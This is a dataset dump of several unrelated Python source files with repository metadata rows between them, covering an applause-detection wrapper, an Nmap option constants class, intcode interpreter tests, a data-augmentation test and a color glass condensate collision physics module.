#sif = amp.utils.get_sif_dir(root_dir) + "/applause_detection.sif"
# the new build puts the sif next to the script.
sif = sys.path[0] + "/applause_detection.sif"
# run singularity
subprocess.run([sif, tmpdir, min_segment_duration], check=True)
# copy the corresponding temporary output file to the output AMP segments JSON
print("Temporary directory " + tmpdir + " after output file generated: " + str(os.listdir(tmpdir)))
shutil.copy(f"{tmpdir}/{filename}.json", amp_segments)
print("Output AMP Segment: " + amp_segments)
exit(0)
if __name__ == "__main__":
main()
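# Invocation sketch (the file names below are placeholders, not from the repo):
#   ./applause_detection.py concert.wav 3 concert_segments.json
# This copies concert.wav into a /tmp working directory, runs
# applause_detection.sif on it with min_segment_duration=3, and writes the
# resulting AMP segments JSON to concert_segments.json.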
| 36.44
| 120
| 0.687157
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 817
| 0.448408
|
b16a393bb50e48e50f448e75e1aa34a864d369d1
| 226
|
py
|
Python
|
5_Pham_Ngo_Tien_Dung/3.1.py
|
lpython2006e/exercies
|
84343eae57d86708a7984aa02f77183a4688a508
|
[
"MIT"
] | null | null | null |
5_Pham_Ngo_Tien_Dung/3.1.py
|
lpython2006e/exercies
|
84343eae57d86708a7984aa02f77183a4688a508
|
[
"MIT"
] | null | null | null |
5_Pham_Ngo_Tien_Dung/3.1.py
|
lpython2006e/exercies
|
84343eae57d86708a7984aa02f77183a4688a508
|
[
"MIT"
] | 8
|
2020-07-10T14:13:54.000Z
|
2020-08-03T08:17:50.000Z
|
"""Write a program that allow user enter a file name (path) then content, allow user to save it"""
filename = input("Please input filename")
f= open(filename,"w+")
content = input("Please input content")
f.write(content)
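# Optional check (illustrative addition, not part of the original exercise):
# read the file back to confirm the content was saved.
with open(filename) as f:
    print(f.read())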
| 37.666667
| 99
| 0.712389
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 147
| 0.650442
|
b16bfa5767e1c86af8aeaefb5fff8896cc5aa5cc
| 1,523
|
py
|
Python
|
dxlnmapclient/constants.py
|
camilastock/opendxl-nmap-client-python
|
2221adcb154a412c14925935159afc67ed9ba7a5
|
[
"Apache-2.0"
] | null | null | null |
dxlnmapclient/constants.py
|
camilastock/opendxl-nmap-client-python
|
2221adcb154a412c14925935159afc67ed9ba7a5
|
[
"Apache-2.0"
] | null | null | null |
dxlnmapclient/constants.py
|
camilastock/opendxl-nmap-client-python
|
2221adcb154a412c14925935159afc67ed9ba7a5
|
[
"Apache-2.0"
] | 1
|
2018-02-12T18:20:18.000Z
|
2018-02-12T18:20:18.000Z
|
class DxlNmapOptions:
"""
    Constants that are used when executing the Nmap tool
+-------------+---------+----------------------------------------------------------+
| Option | Command | Description |
+=============+=========+==========================================================+
| Aggressive | -A | Aggressive Scan |
| Scan | | |
+-------------+---------+----------------------------------------------------------+
| Operating | -O | Operating system in the current host |
| System | | |
+-------------+---------+----------------------------------------------------------+
| Aggressive | -O - A | Both options |
| Scan | | |
| + | | |
| Operating | | |
| System | | |
+-------------+---------+----------------------------------------------------------+
"""
AGGRESSIVE_SCAN = "-A"
OPERATING_SYSTEM = "-O"
AGGRESSIVE_SCAN_OP_SYSTEM = "-O -A"
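# Usage sketch (illustrative; the request wiring below is an assumption, since
# this module only defines the option strings):
# option = DxlNmapOptions.AGGRESSIVE_SCAN_OP_SYSTEM   # "-O -A"
# payload = {"target": "192.168.0.1", "options": option}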
| 60.92
| 88
| 0.169402
| 1,522
| 0.999343
| 0
| 0
| 0
| 0
| 0
| 0
| 1,416
| 0.929744
|
b16c522c8657dbedfb8cc24e18349f5784c77002
| 8,203
|
py
|
Python
|
2019/intcode/intcode/tests/test_intcode.py
|
Ganon11/AdventCode
|
eebf3413c8e73c45d0e0a65a80e57eaf594baead
|
[
"MIT"
] | null | null | null |
2019/intcode/intcode/tests/test_intcode.py
|
Ganon11/AdventCode
|
eebf3413c8e73c45d0e0a65a80e57eaf594baead
|
[
"MIT"
] | null | null | null |
2019/intcode/intcode/tests/test_intcode.py
|
Ganon11/AdventCode
|
eebf3413c8e73c45d0e0a65a80e57eaf594baead
|
[
"MIT"
] | null | null | null |
import intcode
def test_default_constructor(): # pylint: disable=C0116
values = [0, 1, 2, 0, 99]
program = intcode.IntCodeProgram(values)
assert program.instruction_pointer == 0
assert program.memory == values
def test_noun_verb(): # pylint: disable=C0116
values = [0, 1, 2, 0, 99]
program = intcode.IntCodeProgram(values)
assert program.instruction_pointer == 0
assert program.memory == values
program.set_noun(7)
assert program.memory[1] == 7
program.set_verb(3)
assert program.memory[2] == 3
def test_from_text(): # pylint: disable=C0116
values = [0, 1, 2, 0, 99]
program = intcode.IntCodeProgram.from_text("0,1,2,0,99")
assert program.instruction_pointer == 0
assert program.memory == values
program2 = intcode.IntCodeProgram.from_text("0, 1, 2, 0, 99")
assert program2.instruction_pointer == 0
assert program2.memory == values
program3 = intcode.IntCodeProgram.from_text(" 0, 1 , 2 , 0, 99 ")
assert program3.instruction_pointer == 0
assert program3.memory == values
def test_execute_add(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1, 1, 2, 0, 99])
output = program.execute()
assert output == 3
assert program.instruction_pointer == 4
def test_execute_mul(): # pylint: disable=C0116
program = intcode.IntCodeProgram([2, 1, 2, 0, 99])
output = program.execute()
assert output == 2
assert program.instruction_pointer == 4
def test_execute_input(): # pylint: disable=C0116
values = [3, 0, 99]
program = intcode.IntCodeProgram(values, user_input=[77])
output = program.execute()
assert program.instruction_pointer == 2
assert program.memory[0] == 77
assert output == 77
program2 = intcode.IntCodeProgram(values, user_input=77)
output2 = program2.execute()
assert program2.instruction_pointer == 2
assert program2.memory[0] == 77
assert output2 == 77
def test_multiple_input(): # pylint: disable=C0116
values = [3, 0, 3, 1, 99]
program = intcode.IntCodeProgram(values, user_input=[1, 2])
output = program.execute()
assert program.instruction_pointer == 4
assert program.memory[0] == 1
assert program.memory[1] == 2
assert output == 1
program2 = intcode.IntCodeProgram(values, user_input=1)
program2.provide_input(2)
output2 = program2.execute()
assert program2.instruction_pointer == 4
assert program2.memory[0] == 1
assert program2.memory[1] == 2
assert output2 == 1
def test_execute_output(): # pylint: disable=C0116
program = intcode.IntCodeProgram([4, 0, 99])
output = program.execute()
assert program.instruction_pointer == 2
assert output == 4
assert len(program.output) == 1
assert 4 in program.output
def test_execute_output_immediate_mode(): # pylint: disable=C0116
program = intcode.IntCodeProgram([104, 50, 99])
output = program.execute()
assert program.instruction_pointer == 2
assert output == 104
assert len(program.output) == 1
assert 50 in program.output
def test_execute_multiple_output(): # pylint: disable=C0116
program = intcode.IntCodeProgram([4, 0, 104, 50, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 4
assert len(program.output) == 2
assert 4 in program.output
assert 50 in program.output
def test_execute_add_immediate_mode(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1101, 50, 60, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 110
def test_execute_add_mixed_modes(): # pylint: disable=C0116
program = intcode.IntCodeProgram([101, 50, 0, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 151
program = intcode.IntCodeProgram([1001, 0, 50, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 1051
def test_execute_mul_immediate_mode(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1102, 5, 6, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 30
def test_execute_mul_mixed_modes(): # pylint: disable=C0116
program = intcode.IntCodeProgram([102, 2, 0, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 204
program = intcode.IntCodeProgram([1002, 0, 2, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 2004
def test_execute_jump_if_true(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1105, 1, 7, 1102, 0, 0, 0, 99])
output = program.execute()
assert program.instruction_pointer == 7
assert output == 1105
program = intcode.IntCodeProgram([1105, 0, 7, 1102, 0, 0, 0, 99])
output = program.execute()
assert program.instruction_pointer == 7
assert output == 0
def test_execute_jump_if_false(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1106, 1, 7, 1102, 0, 0, 0, 99])
output = program.execute()
assert program.instruction_pointer == 7
assert output == 0
program = intcode.IntCodeProgram([1106, 0, 7, 1102, 0, 0, 0, 99])
output = program.execute()
assert program.instruction_pointer == 7
assert output == 1106
def test_execute_less_than(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1107, 1, 2, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 1
program = intcode.IntCodeProgram([1107, 2, 2, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 0
program = intcode.IntCodeProgram([1107, 2, 1, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 0
def test_execute_equals(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1108, 1, 2, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 0
program = intcode.IntCodeProgram([1108, 2, 2, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 1
program = intcode.IntCodeProgram([1108, 2, 1, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 0
def test_step(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1108, 1, 2, 0, 1108, 2, 2, 0, 1108, 2, 1, 0, 99])
program.step()
assert not program.has_halted
assert program.instruction_pointer == 4
program.step()
assert not program.has_halted
assert program.instruction_pointer == 8
program.step()
assert not program.has_halted
assert program.instruction_pointer == 12
program.step()
assert program.has_halted
assert program.instruction_pointer == 12
def test_step_without_input_is_no_op(): # pylint: disable=C0116
program = intcode.IntCodeProgram([3, 1, 99])
program.step()
assert program.instruction_pointer == 0
assert not program.has_halted
program.provide_input(103)
program.step()
assert program.instruction_pointer == 2
assert not program.has_halted
program.step()
assert program.instruction_pointer == 2
assert program.has_halted
def test_execute_will_return_early_if_waiting_for_input(): # pylint: disable=C0116
program = intcode.IntCodeProgram([3, 1, 99])
program.execute()
assert not program.has_halted
assert program.instruction_pointer == 0
program.provide_input(103)
program.execute()
assert program.instruction_pointer == 2
assert program.has_halted
def test_update_relative_base(): # pylint: disable=C0116
program = intcode.IntCodeProgram([201, 2, 1, 17, 109, 17, 2201, 0, 0, 19, 99])
program.execute()
assert program.instruction_pointer == 10
assert program.has_halted
assert program._relative_base == 17 # pylint: disable=W0212
def test_increased_available_memory(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1101, 1, 2, 17, 99])
program.execute()
assert len(program.memory) == 18
assert program.instruction_pointer == 4
assert program.has_halted
def test_reddit(): # pylint: disable=C0116
program = intcode.IntCodeProgram([109, 1, 203, 2, 204, 2, 99])
program.provide_input(77)
program.execute()
print(program)
print(program.output)
if __name__ == "__main__":
test_reddit()
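# Opcode reference inferred from the tests above (matches Advent of Code 2019):
#   1 add, 2 multiply, 3 input, 4 output, 5 jump-if-true, 6 jump-if-false,
#   7 less-than, 8 equals, 9 adjust relative base, 99 halt.
# Parameter modes (digits left of the two-digit opcode): 0 position,
#   1 immediate, 2 relative.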
| 31.30916
| 85
| 0.720224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 644
| 0.078508
|
b16cd2c50420d1e6d132def2948468675ae9b60d
| 720
|
py
|
Python
|
tests/test_DataAugmenterExternally.py
|
AlexKay28/zarnitsa
|
c7e93423dcc1f000849f8c1e1f685e8a91b90f9c
|
[
"Apache-2.0"
] | 8
|
2021-07-19T18:25:03.000Z
|
2021-10-05T15:25:20.000Z
|
tests/test_DataAugmenterExternally.py
|
AlexKay28/zarnitsa
|
c7e93423dcc1f000849f8c1e1f685e8a91b90f9c
|
[
"Apache-2.0"
] | 22
|
2021-07-26T19:13:32.000Z
|
2021-10-09T18:56:07.000Z
|
tests/test_DataAugmenterExternally.py
|
AlexKay28/zarnitsa
|
c7e93423dcc1f000849f8c1e1f685e8a91b90f9c
|
[
"Apache-2.0"
] | 1
|
2021-08-10T12:24:00.000Z
|
2021-08-10T12:24:00.000Z
|
import os
import sys
import pytest
import numpy as np
import pandas as pd
from scipy.stats import ks_2samp
sys.path.append("zarnitsa/")
from zarnitsa.stats import DataAugmenterExternally
N_TO_CHECK = 500
SIG = 0.5
@pytest.fixture
def dae():
return DataAugmenterExternally()
@pytest.fixture
def normal_data():
return pd.Series(np.random.normal(0, SIG * 3, size=N_TO_CHECK), dtype="float64")
def test_augment_distrib_random_normal(dae, normal_data):
"""
Augment column with normal distribution
"""
normal_data_aug = dae.augment_distrib_random(
aug_type="normal", size=N_TO_CHECK, loc=0, scale=SIG * 3
)
assert ks_2samp(normal_data, normal_data_aug).pvalue > 0.01, "KS criteria"
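# The two-sample Kolmogorov-Smirnov test above checks that the augmented values
# are statistically indistinguishable from the reference normal sample: a
# p-value above 0.01 means we cannot reject that both come from one distribution.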
| 20
| 84
| 0.730556
| 0
| 0
| 0
| 0
| 182
| 0.252778
| 0
| 0
| 96
| 0.133333
|
b16d517f951d0f5516bebdb100e3d55e1e838a34
| 22,314
|
py
|
Python
|
cgc/Collision.py
|
Jfeatherstone/ColorGlass
|
f242541df614a8eea97c43d3480c779e92660ebb
|
[
"MIT"
] | null | null | null |
cgc/Collision.py
|
Jfeatherstone/ColorGlass
|
f242541df614a8eea97c43d3480c779e92660ebb
|
[
"MIT"
] | null | null | null |
cgc/Collision.py
|
Jfeatherstone/ColorGlass
|
f242541df614a8eea97c43d3480c779e92660ebb
|
[
"MIT"
] | null | null | null |
from .Wavefunction import Wavefunction
import numpy as np
from scipy.fft import ifft2, fft2
import numba
CACHE_OPTIMIZATIONS = True
class Collision():
targetWavefunction = None # Implements wilson line
incidentWavefunction = None # Doesn't (have to) implement wilson line
_omega = None
_omegaFFT = None
_particlesProduced = None
_particlesProducedDeriv = None
_momentaMagSquared = None
_momentaComponents = None
_thetaInFourierSpace = None
_momentaBins = None
_fourierHarmonics = None # This will be initialized as an empty dict to store harmonics (see __init__)
_omegaExists = False
_omegaFFTExists = False
_momentaComponentsExist = False
_particlesProducedExists = False
_particlesProducedDerivExists = False
_momentaBinsExists = False
def __init__(self, wavefunction1: Wavefunction, wavefunction2: Wavefunction):
r"""
Initialize a collision with two wavefunctions, presumably a nucleus and a proton. One must implement
the wilson line, though the order of the arguments does not matter.
In the case that both wavefunctions implement the wilson line, the first (wavefunction1) will be used as such.
In the case that neither implement the wilson line, an exception will be raised.
Parameters
----------
wavefunction1 : Wavefunction (or child)
The first wavefunction
wavefunction2 : Wavefunction (or child)
The second wavefunction
"""
# Make sure that at least one has a wilson line
wilsonLineExists1 = callable(getattr(wavefunction1, "wilsonLine", None))
wilsonLineExists2 = callable(getattr(wavefunction2, "wilsonLine", None))
if not wilsonLineExists1 and not wilsonLineExists2:
raise Exception("Neither of the wavefunctions passed to Collision(Wavefunction, Wavefunction) implement the wilsonLine() method; at least one is required to.")
if wilsonLineExists1 and not wilsonLineExists2:
self.targetWavefunction = wavefunction1
self.incidentWavefunction = wavefunction2
elif wilsonLineExists2 and not wilsonLineExists1:
self.targetWavefunction = wavefunction2
self.incidentWavefunction = wavefunction1
else:
self.targetWavefunction = wavefunction1
self.incidentWavefunction = wavefunction2
# Make sure that both use the same number of colors
if self.targetWavefunction.gluonDOF != self.incidentWavefunction.gluonDOF:
raise Exception(f"Wavefunctions implement different gluon degrees of freedom (number of color charges): {self.incidentWavefunction.gluonDOF} vs. {self.targetWavefunction.gluonDOF}")
        # Probably some other checks that need to be done to make sure the two wavefunctions are compatible, but this is fine for now
# Carry over some variables so we don't have to call through the wavefunctions so much
self.N = self.targetWavefunction.N
self.length = self.targetWavefunction.length
self.gluonDOF = self.targetWavefunction.gluonDOF
self.delta = self.targetWavefunction.delta
self.delta2 = self.targetWavefunction.delta2
#print(self.targetWavefunction)
#print(self.incidentWavefunction)
# Variables to do with binning the momenta later on
self.binSize = 4*np.pi/self.length
self.kMax = 2/self.delta
self.numBins = int(self.kMax/self.binSize)
        # This has to be initialized as an empty dict within the constructor:
        # a dict defined at class level would be a mutable class attribute,
        # shared across every Collision instance.
        self._fourierHarmonics = {}
def omega(self, forceCalculate=False, verbose=0):
r"""
Calculate the field omega at each point on the lattice.
If the field already exists, it is simply returned and no calculation is done.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
omega : array(N, N, 2, 2, `colorCharges`**2 - 1)
"""
if self._omegaExists and not forceCalculate:
return self._omega
self.incidentWavefunction.gaugeField(verbose=verbose)
self.targetWavefunction.adjointWilsonLine(verbose=verbose)
if verbose > 0:
print(f'Calculating {type(self).__name__} omega' + '.'*10, end='')
self._omega = _calculateOmegaOpt(self.N, self.gluonDOF, self.delta, self.incidentWavefunction.gaugeField(), self.targetWavefunction.adjointWilsonLine())
self._omegaExists = True
if verbose > 0:
print('finished!')
return self._omega
def omegaFFT(self, forceCalculate=False, verbose=0):
r"""
Compute the fourier transform of the field omega on the lattice.
If the fft of the field already exists, it is simply returned and no calculation is done.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
omegaFFT : array(N, N, 2, 2, `colorCharges`**2 - 1)
"""
if self._omegaFFTExists and not forceCalculate:
return self._omegaFFT
# Make sure omega exists
self.omega(verbose=verbose)
if verbose > 0:
print(f'Calculating {type(self).__name__} omega fourier transform' + '.'*10, end='')
        # We want to do the normalization explicitly, but scipy doesn't offer an
        # unnormalized option, so we set the norm to the opposite of the transform
        # direction we are doing (forward for ifft, backward for fft)
        # (we had some issues with scipy changing its default mode)
self._omegaFFT = self.delta2 * fft2(self._omega, axes=(0,1), norm='backward')
self._omegaFFTExists = True
if verbose > 0:
print('finished!')
return self._omegaFFT
def momentaBins(self, forceCalculate=False, verbose=0):
r"""
Compute the range of momenta at which particles will be created based on the dimensions of the lattice.
The exact values are:
- \( k_{max} = 2 / \Delta\)
- \( w_k = 4 \pi / L \)
If the bins already exist, they are simply returned and no calculation is done.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
momentaBins : array(numBins = L / (delta 2 pi))
"""
if self._momentaBinsExists and not forceCalculate:
return self._momentaBins
if verbose > 0:
print(f'Calculating {type(self).__name__} momentum bins' + '.'*10, end='')
self._momentaBins = [i*self.binSize for i in range(self.numBins)]
self._momentaBinsExists = True
if verbose > 0:
print('finished!')
return self._momentaBins
def momentaComponents(self, forceCalculate=False, verbose=0):
r"""
Compute the components of the momentum at each point on the lattice, according to:
$$ (k_x, k_y) = \frac{2}{\Delta} \left( \sin\left( \frac{\pi i}{N} \right), \sin\left( \frac{\pi j}{N} \right) \right) $$
where \(i\) and \(j\) index the \(x\) and \(y\) directions in real space, respectively.
If the calculation has already been done, the result is simply returned and is not repeated.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
momentaComponents : array(N, N, 2)
"""
if self._momentaComponentsExist and not forceCalculate:
return self._momentaComponents
if verbose > 0:
print(f'Calculating {type(self).__name__} momentum components' + '.'*10, end='')
self._momentaComponents, self._thetaInFourierSpace = _calculateMomentaOpt(self.N, self.delta)
self._momentaMagSquared = np.linalg.norm(self._momentaComponents, axis=2)**2
self._momentaComponentsExist = True
if verbose > 0:
print('finished!')
return self._momentaComponents
def momentaMagnitudeSquared(self, forceCalculate=False, verbose=0):
r"""
Compute the magnitude of the momentum at each point on the lattice, according to:
$$ |k| = \sqrt{k_x^2 + k_y^2} $$
$$ (k_x, k_y) = \frac{2}{\Delta} \left( \sin\left( \frac{\pi i}{N} \right), \sin\left( \frac{\pi j}{N} \right) \right) $$
where \(i\) and \(j\) index the \(x\) and \(y\) directions in real space, respectively.
If the calculation has already been done, the result is simply returned and is not repeated.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
momentaComponents : array(N, N)
"""
if self._momentaComponentsExist and not forceCalculate:
return self._momentaMagSquared
if verbose > 0:
print(f'Calculating {type(self).__name__} momenta magnitude squared' + '.'*10, end='')
self._momentaComponents, self._thetaInFourierSpace = _calculateMomentaOpt(self.N, self.delta)
self._momentaMagSquared = np.linalg.norm(self._momentaComponents, axis=2)**2
self._momentaComponentsExist = True
if verbose > 0:
print('finished!')
return self._momentaMagSquared
def particlesProducedDeriv(self, forceCalculate=False, verbose=0):
r"""
Compute the derivative of particles produced (\( \frac{d^2 N}{d^2 k} \)) at each point on the lattice
If the calculation has already been done, the result is simply returned and is not repeated.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
particlesProducedDeriv : array(N, N)
"""
if self._particlesProducedDerivExists and not forceCalculate:
return self._particlesProducedDeriv
# Make sure these quantities exist
self.omegaFFT(verbose=verbose)
self.momentaMagnitudeSquared(verbose=verbose) # This also calculates thetaInFourierSpace and momentaComponents
if verbose > 0:
print(f'Calculating {type(self).__name__} derivative of particles produced' + '.'*10, end='')
self._particlesProducedDeriv = _calculateParticlesProducedDerivOpt(self.N, self.gluonDOF, self._momentaMagSquared, self._omegaFFT)
if verbose > 0:
print('finished!')
self._particlesProducedDerivExists = True
return self._particlesProducedDeriv
def particlesProduced(self, forceCalculate=False, verbose=0):
r"""
Compute the number of particles produced \(N(|k|)\) as a function of momentum. Note that this
is technically the zeroth fourier harmonic, so this actually just calls the
cgc.Collision.fourierHarmonic() function.
The particles are binned according to cgc.Collision.momentaBins().
Most likely will be plotted against cgc.Collision.momentaBins().
If the calculation has already been done, the result is simply returned and is not repeated.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
particlesProduced : array(numBins = L / (delta 2 pi))
"""
# This one is strictly real, so we should make sure that is updated
self._fourierHarmonics[0] = np.real(self.fourierHarmonic(0, forceCalculate, verbose))
return self._fourierHarmonics[0]
def fourierHarmonic(self, harmonic: int, forceCalculate=False, verbose=0):
r"""
Calculate the fourier harmonic of the particle production as:
$$ v_n = \frac{ \sum_{(i,j)\in [k, k+ \Delta k]} |k| \frac{d^2 N}{d^2 k} e^{i n \theta }} { \sum_{(i,j)\in [k, k+ \Delta k]} |k| } $$
If the calculation has already been done, the result is simply returned and is not repeated.
Parameters
----------
harmonic : int
The fourier harmonic to calculate. All odd harmonics should be zero, and the zeroth harmonic
will be equal to cgc.Collision.particlesProduced()
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
particlesProduced : array(numBins = L / (delta 2 pi))
"""
# First, see if we have already calculated this harmonic
if harmonic in self._fourierHarmonics.keys() and not forceCalculate:
return self._fourierHarmonics[harmonic]
# For actually calculating the harmonic, we first have to make sure we've calculated
# the derivative, dN/d^2k
# This makes sure that _momentaMagSquared, _thetaInFourierSpace and _particlesProducedDeriv
# all exist
self.particlesProducedDeriv(verbose=verbose)
if verbose > 0:
print(f'Calculating {type(self).__name__} fourier harmonic: {harmonic}' + '.'*10, end='')
# Drop all of our arrays into long 1D structure, since we will want to bin them
vectorizedParticleDerivs = np.reshape(self._particlesProducedDeriv, [self.N*self.N])
vectorizedTheta = np.reshape(self._thetaInFourierSpace, [self.N*self.N])
vectorizedMomentaMag = np.reshape(np.sqrt(self._momentaMagSquared), [self.N*self.N])
# The number of particles that are produced in each bin
# These bins are actually just thin rings in momentum space
self._fourierHarmonics[harmonic] = np.zeros(self.numBins, dtype='complex')
        # The bin sizes/bounds are calculated by momentaBins()
self.momentaBins()
        # Ideally, these rings would have only an infinitesimal thickness dk,
        # but since we have a discrete lattice, we weight the particles by their momentum
        # (which may vary slightly within a bin) and then properly normalize
# Go through each bin and calculate (for all points in that bin):
# 1. Sum over |k| * dN/d^2k * exp(i * harmonic * theta)
# 2. Sum over |k|
        # 3. Divide the result of 1. by the result of 2.
for i in range(self.numBins):
# Find which places on the lattice fall into this particular momentum bin
# Note the use of element-wise (or bitwise) and, "&"
particleDerivsInRing = vectorizedParticleDerivs[(vectorizedMomentaMag < self.binSize*(i+1)) & (vectorizedMomentaMag > self.binSize*i)]
momentaMagInRing = vectorizedMomentaMag[(vectorizedMomentaMag < self.binSize*(i+1)) & (vectorizedMomentaMag > self.binSize*i)]
thetaInRing = vectorizedTheta[(vectorizedMomentaMag < self.binSize*(i+1)) & (vectorizedMomentaMag > self.binSize*i)]
# Note that multiplication is done element-wise by default
numeratorSum = np.sum(particleDerivsInRing * momentaMagInRing * np.exp(1.j * harmonic * thetaInRing))
denominatorSum = np.sum(momentaMagInRing)
self._fourierHarmonics[harmonic][i] = numeratorSum / denominatorSum
if verbose > 0:
print('finished!')
return self._fourierHarmonics[harmonic]
# Using custom functions within other jitted functions can cause some issues,
# so we define the signatures explicitly for these two functions.
# Both are central differences with periodic boundary conditions: the upper
# neighbor wraps around via the modulo, and the lower neighbor wraps around
# via Python's negative indexing.
@numba.jit((numba.float64[:,:], numba.int64, numba.int64, numba.int64, numba.float64), nopython=True, cache=CACHE_OPTIMIZATIONS)
def _x_deriv(matrix, i, j, N, delta):
    return (matrix[i,(j+1)%N] - matrix[i,j-1]) / (2 * delta)
@numba.jit((numba.float64[:,:], numba.int64, numba.int64, numba.int64, numba.float64), nopython=True, cache=CACHE_OPTIMIZATIONS)
def _y_deriv(matrix, i, j, N, delta):
    return (matrix[(i+1)%N,j] - matrix[i-1,j]) / (2 * delta)
# Because of the same issue described above, we can't cache this function
# This function gives a warning because numba only experimentally supports
# treating functions as objects (the list derivs).
@numba.jit(nopython=True)
def _calculateOmegaOpt(N, gluonDOF, delta, incidentGaugeField, targetAdjointWilsonLine):
"""
Calculate the field omega at each point on the lattice.
If the field already exists, it is simply returned and no calculation is done.
Returns
-------
numpy.array : shape=(N, N, 2, 2, `colorCharges`**2 - 1)
"""
# 2,2 is for the 2 dimensions, x and y
omega = np.zeros((N, N, 2, 2, gluonDOF), dtype='complex') # 2 is for two dimensions, x and y
derivs = [_x_deriv, _y_deriv]
for i in range(N):
for j in range(N):
for k in range(gluonDOF):
for l in range(2): # 2 is number of dimensions
for n in range(2): # 2 is number of dimensions
omega[i,j,l,n,k] = np.sum(np.array([derivs[l](incidentGaugeField[:,:,m], i, j, N, delta) * derivs[n](targetAdjointWilsonLine[:,:,k,m], i, j, N, delta) for m in range(gluonDOF)]))
return omega
@numba.jit(nopython=True, cache=CACHE_OPTIMIZATIONS)
def _calculateMomentaOpt(N, delta):
"""
    Optimized (via numba) function to calculate the position (momentum) in Fourier space of each point
Parameters
----------
N : int
Size of the lattice
delta : double
Spacing between each point
Returns
-------
(momentaComponents, theta)
momentaComponents : array(N, N, 2)
x and y components of the momentum at each point
theta : array(N, N)
            The polar angle of the momentum at each point, atan2(k_y, k_x)
"""
momentaComponents = np.zeros((N, N, 2))
theta = np.zeros((N, N))
for i in range(N):
for j in range(N):
# Note that these components are of the form:
# k_x = 2/a sin(k_x' a / 2)
# Though the argument of the sin is simplified a bit
momentaComponents[i,j] = [2/delta * np.sin(np.pi*i/N) * np.sign(np.sin(2*np.pi*i/N)), 2/delta * np.sin(np.pi*j/N) * np.sign(np.sin(2*np.pi*j/N))]
theta[i,j] = np.arctan2(momentaComponents[i,j,1], momentaComponents[i,j,0])
return momentaComponents, theta
@numba.jit(nopython=True, cache=CACHE_OPTIMIZATIONS)
def _calculateParticlesProducedDerivOpt(N, gluonDOF, momentaMagSquared, omegaFFT):
"""
Optimized (via numba) function to calculate dN/d^2k
Parameters
----------
N : int
The system size
gluonDOF : int
The number of gluon degrees of freedom ((possible color charges)^2 - 1)
momentaMagSquared : array(N, N)
The magnitude of the momentum at each point, likely calculated (in part) with _calculateMomentaOpt()
omegaFFT : array(2, 2, gluonDOF, N, N)
Previously calculated omega array
Returns
-------
particleProduction : array(N, N)
The number of particles produced at each point on the momentum lattice
"""
# Where we will calculate dN/d^2k
particleProduction = np.zeros((N,N))
    # 2D Levi-Civita symbol
    LCS = np.array([[0,1],[-1,0]])
    # 2D Kronecker delta
    KDF = np.array([[1,0],[0,1]])
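    # The nested loops below implement, schematically,
    #   dN/d^2k = 2/(2 pi)^3 * 1/|k|^2
    #             * sum_{i,j,l,m,a} (KDF[i,j]*KDF[l,m] + LCS[i,j]*LCS[l,m])
    #             * omegaFFT[i,j,a] * conj(omegaFFT[l,m,a])
    # i.e. a contraction of the Fourier-transformed omega field with itself.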
    # Note that unlike in the rest of the code, i and j *do not* refer to the
    # spatial indices here: x and y do (too many indices... :/ )
for y in range(N):
for x in range(N):
# To prevent any divide by zero errors
if momentaMagSquared[y,x] == 0:
continue
# All of these 2s are for our two dimensions, x and y
for i in range(2):
for j in range(2):
for l in range(2):
for m in range(2):
for a in range(gluonDOF):
particleProduction[y,x] += np.real(2/(2*np.pi)**3 / momentaMagSquared[y,x] * (
(KDF[i,j]*KDF[l,m] + LCS[i,j]*LCS[l,m])) * (
omegaFFT[y,x,i,j,a] * np.conj(omegaFFT[y,x,l,m,a])))
return particleProduction
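# --- Hedged usage sketch (added; not part of the original source) ---
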